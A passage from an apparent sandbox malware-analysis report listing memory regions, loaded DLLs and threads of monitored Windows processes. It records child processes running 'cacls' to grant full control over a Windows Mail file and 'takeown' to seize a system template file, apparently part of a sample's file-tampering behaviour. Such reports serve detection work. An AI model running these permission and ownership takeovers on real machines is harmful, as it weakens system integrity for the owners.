"\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7487 start_va = 0x6495030000 end_va = 0x6495170fff entry_point = 0x6495030000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7488 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7489 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7490 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7517 start_va = 0x6495030000 end_va = 0x64950affff entry_point = 0x0 region_type = private name = "private_0x0000006495030000" filename = "" Region: id = 7518 start_va = 0x7ff702466000 end_va = 0x7ff702467fff entry_point = 0x0 region_type = private name = "private_0x00007ff702466000" filename = "" Region: id = 7519 start_va = 0x64950b0000 end_va = 0x649512ffff entry_point = 0x0 region_type = private name = "private_0x00000064950b0000" filename = "" Region: id = 7520 start_va = 0x6495130000 end_va = 0x64951affff entry_point = 0x0 region_type = private name = "private_0x0000006495130000" filename = "" Region: id = 7521 start_va = 0x7ff70233e000 end_va = 0x7ff70233ffff entry_point = 0x0 region_type = private name = "private_0x00007ff70233e000" filename = "" Region: id = 7522 start_va = 0x7ff702464000 end_va = 0x7ff702465fff entry_point = 0x0 region_type = private name = "private_0x00007ff702464000" filename = "" Region: id = 7523 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 7618 start_va = 0x64951b0000 end_va = 0x649522ffff entry_point = 0x0 region_type = private name = "private_0x00000064951b0000" filename = "" Region: id = 7619 start_va = 0x7ff70233c000 end_va = 0x7ff70233dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70233c000" filename = "" Region: id = 7620 start_va = 0x6495230000 end_va = 0x64952affff entry_point = 0x0 region_type = private name = "private_0x0000006495230000" filename = "" Region: id = 7621 start_va = 0x7ff70233a000 end_va = 0x7ff70233bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70233a000" filename = "" Region: id = 7645 start_va = 0x64952b0000 end_va = 0x649532ffff entry_point = 0x0 region_type = private name = "private_0x00000064952b0000" filename = "" Region: id = 7646 start_va = 0x7ff702338000 end_va = 0x7ff702339fff entry_point = 0x0 region_type = private name = "private_0x00007ff702338000" filename = "" Region: id = 7654 start_va = 0x7ffae9440000 end_va = 0x7ffae9464fff entry_point = 0x7ffae9440000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 7655 start_va = 0x7ffaed1a0000 end_va = 0x7ffaed1dcfff entry_point = 0x7ffaed1a0000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 7658 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 7659 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 7660 start_va = 0x6495330000 end_va = 0x64953d2fff entry_point = 0x6495330000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7661 start_va = 0x6495330000 end_va = 0x64953b9fff entry_point = 0x6495330000 region_type = mapped_file name = "acpi.sys" filename = "\\Windows\\System32\\drivers\\acpi.sys" (normalized: "c:\\windows\\system32\\drivers\\acpi.sys") Region: id = 7662 start_va = 0x6495330000 end_va = 0x649544dfff entry_point = 0x6495330000 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 7677 start_va = 0x6494710000 end_va = 0x649471afff entry_point = 0x6494710000 region_type = mapped_file name = "mssmbios.sys" filename = "\\Windows\\System32\\drivers\\mssmbios.sys" (normalized: "c:\\windows\\system32\\drivers\\mssmbios.sys") Region: id = 7678 start_va = 0x6494780000 end_va = 0x649478ffff entry_point = 0x0 region_type = private name = "private_0x0000006494780000" filename = "" Region: id = 7721 start_va = 0x6494710000 end_va = 0x6494723fff entry_point = 0x6494710000 region_type = mapped_file name = "hdaudbus.sys" filename = "\\Windows\\System32\\drivers\\hdaudbus.sys" (normalized: "c:\\windows\\system32\\drivers\\hdaudbus.sys") Region: id = 7735 start_va = 0x6494710000 end_va = 0x649475efff entry_point = 0x6494710000 region_type = mapped_file name = "portcls.sys" filename = "\\Windows\\System32\\drivers\\portcls.sys" (normalized: "c:\\windows\\system32\\drivers\\portcls.sys") Region: id = 7794 start_va = 0x6494710000 end_va = 0x6494719fff entry_point = 0x6494710000 region_type = mapped_file name = "monitor.sys" filename = "\\Windows\\System32\\drivers\\monitor.sys" (normalized: "c:\\windows\\system32\\drivers\\monitor.sys") Region: id = 8148 start_va = 0x6495330000 end_va = 0x649544dfff entry_point = 0x6495330000 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 8233 start_va = 0x6494710000 end_va = 0x649471ffff entry_point = 0x6494710000 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 8604 start_va = 0x6494710000 end_va = 0x6494719fff entry_point = 0x6494710000 region_type = mapped_file name = "monitor.sys" filename = "\\Windows\\System32\\drivers\\monitor.sys" (normalized: "c:\\windows\\system32\\drivers\\monitor.sys") Thread: id = 878 os_tid = 0xa68 Thread: id = 882 os_tid = 0x2f4 Thread: id = 884 os_tid = 0xb6c Thread: id = 886 os_tid = 0xadc Thread: id = 888 os_tid = 0xbf8 Thread: id = 889 os_tid = 0x2c4 Thread: id = 892 os_tid = 0xe88 Thread: id = 895 os_tid = 0xf48 Thread: id = 897 os_tid = 0xe80 Process: id = "102" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x11cc6000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0xf04" cmd_line = "cacls \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7380 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 7381 start_va = 0xf20000 end_va = 0x4f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 7382 start_va = 0x4f20000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 7383 start_va = 0x4f40000 end_va = 0x4f41fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 7384 start_va = 0x4f50000 end_va = 0x4f63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 7385 start_va = 0x4f70000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 7386 start_va = 0x4fb0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 7387 start_va = 0x4ff0000 end_va = 0x4ff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ff0000" filename = "" Region: id = 7388 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7389 start_va = 0x7f580000 end_va = 0x7f5a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f580000" filename = "" Region: id = 7390 start_va = 0x7f5a8000 end_va = 0x7f5a8fff entry_point = 0x0 region_type = private name = "private_0x000000007f5a8000" filename = "" Region: id = 7391 start_va = 0x7f5ac000 end_va = 0x7f5aefff entry_point = 0x0 region_type = private name = "private_0x000000007f5ac000" filename = "" Region: id = 7392 start_va = 0x7f5af000 end_va = 0x7f5affff entry_point = 0x0 region_type = private name = "private_0x000000007f5af000" filename = "" Region: id = 7393 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7394 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7395 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7396 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7397 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7398 start_va = 0x5000000 end_va = 0x5000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005000000" filename = "" Region: id = 7399 start_va = 0x5010000 end_va = 0x5011fff entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 7403 start_va = 0x5140000 end_va = 0x514ffff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 7404 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7405 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7406 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7407 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7409 start_va = 0x5150000 end_va = 0x53bffff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 7410 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7411 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7412 start_va = 0x4f20000 end_va = 0x4f2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f20000" filename = "" Region: id = 7413 start_va = 0x7f480000 end_va = 0x7f57ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f480000" filename = "" Region: id = 7491 start_va = 0x5020000 end_va = 0x50ddfff entry_point = 0x5020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7492 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7493 start_va = 0x50e0000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 7494 start_va = 0x5150000 end_va = 0x518ffff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 7495 start_va = 0x52c0000 end_va = 0x53bffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 7496 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7497 start_va = 0x7f5a9000 end_va = 0x7f5abfff entry_point = 0x0 region_type = private name = "private_0x000000007f5a9000" filename = "" Region: id = 7498 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7499 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7500 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7501 start_va = 0x4f30000 end_va = 0x4f33fff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 7502 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7503 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7504 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 7505 start_va = 0x5190000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 7506 start_va = 0x4f40000 end_va = 0x4f43fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 7524 start_va = 0x53c0000 end_va = 0x56f6fff entry_point = 0x53c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7525 start_va = 0x5120000 end_va = 0x5121fff entry_point = 0x5120000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 880 os_tid = 0xf0 Thread: id = 887 os_tid = 0x9b8 Process: id = "103" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1a7ad000" os_pid = "0x84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0xe4c" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7465 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 7466 start_va = 0xc90000 end_va = 0x4c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 7467 start_va = 0x4c90000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 7468 start_va = 0x4cb0000 end_va = 0x4cb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 7469 start_va = 0x4cc0000 end_va = 0x4cd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 7470 start_va = 0x4ce0000 end_va = 0x4d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 7471 start_va = 0x4d20000 end_va = 0x4d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 7472 start_va = 0x4d60000 end_va = 0x4d63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 7473 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7474 start_va = 0x7e4a0000 end_va = 0x7e4c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4a0000" filename = "" Region: id = 7475 start_va = 0x7e4c4000 end_va = 0x7e4c4fff entry_point = 0x0 region_type = private name = "private_0x000000007e4c4000" filename = "" Region: id = 7476 start_va = 0x7e4cb000 end_va = 0x7e4cbfff entry_point = 0x0 region_type = private name = "private_0x000000007e4cb000" filename = "" Region: id = 7477 start_va = 0x7e4cd000 end_va = 0x7e4cffff entry_point = 0x0 region_type = private name = "private_0x000000007e4cd000" filename = "" Region: id = 7478 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7479 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7480 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7481 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7482 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7483 start_va = 0x4d70000 end_va = 0x4d70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d70000" filename = "" Region: id = 7484 start_va = 0x4d80000 end_va = 0x4d81fff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 7507 start_va = 0x4f70000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 7508 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7509 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7510 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7511 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7512 start_va = 0x4f80000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 7513 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7514 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7515 start_va = 0x4c90000 end_va = 0x4c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c90000" filename = "" Region: id = 7516 start_va = 0x7e3a0000 end_va = 0x7e49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e3a0000" filename = "" Region: id = 7571 start_va = 0x4d90000 end_va = 0x4e4dfff entry_point = 0x4d90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7572 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7573 start_va = 0x4e50000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 7574 start_va = 0x4e90000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 7575 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7576 start_va = 0x7e4c8000 end_va = 0x7e4cafff entry_point = 0x0 region_type = private name = "private_0x000000007e4c8000" filename = "" Region: id = 7577 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7578 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7579 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7580 start_va = 0x4ca0000 end_va = 0x4ca3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 7581 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7582 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7583 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7584 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7585 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7586 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7587 start_va = 0x4ed0000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 7588 start_va = 0x4ef0000 end_va = 0x4f19fff entry_point = 0x4ef0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7589 start_va = 0x4f80000 end_va = 0x5107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f80000" filename = "" Region: id = 7590 start_va = 0x5170000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 7591 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7592 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7593 start_va = 0x4cb0000 end_va = 0x4cb4fff entry_point = 0x4cb0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 7594 start_va = 0x5270000 end_va = 0x53f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005270000" filename = "" Region: id = 7595 start_va = 0x5400000 end_va = 0x67fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005400000" filename = "" Region: id = 7596 start_va = 0x4ed0000 end_va = 0x4ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 7597 start_va = 0x4ee0000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 7598 start_va = 0x4ef0000 end_va = 0x4ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 7622 start_va = 0x6800000 end_va = 0x6b36fff entry_point = 0x6800000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7643 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7644 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 885 os_tid = 0x418 Thread: id = 893 os_tid = 0xf80 Process: id = "104" 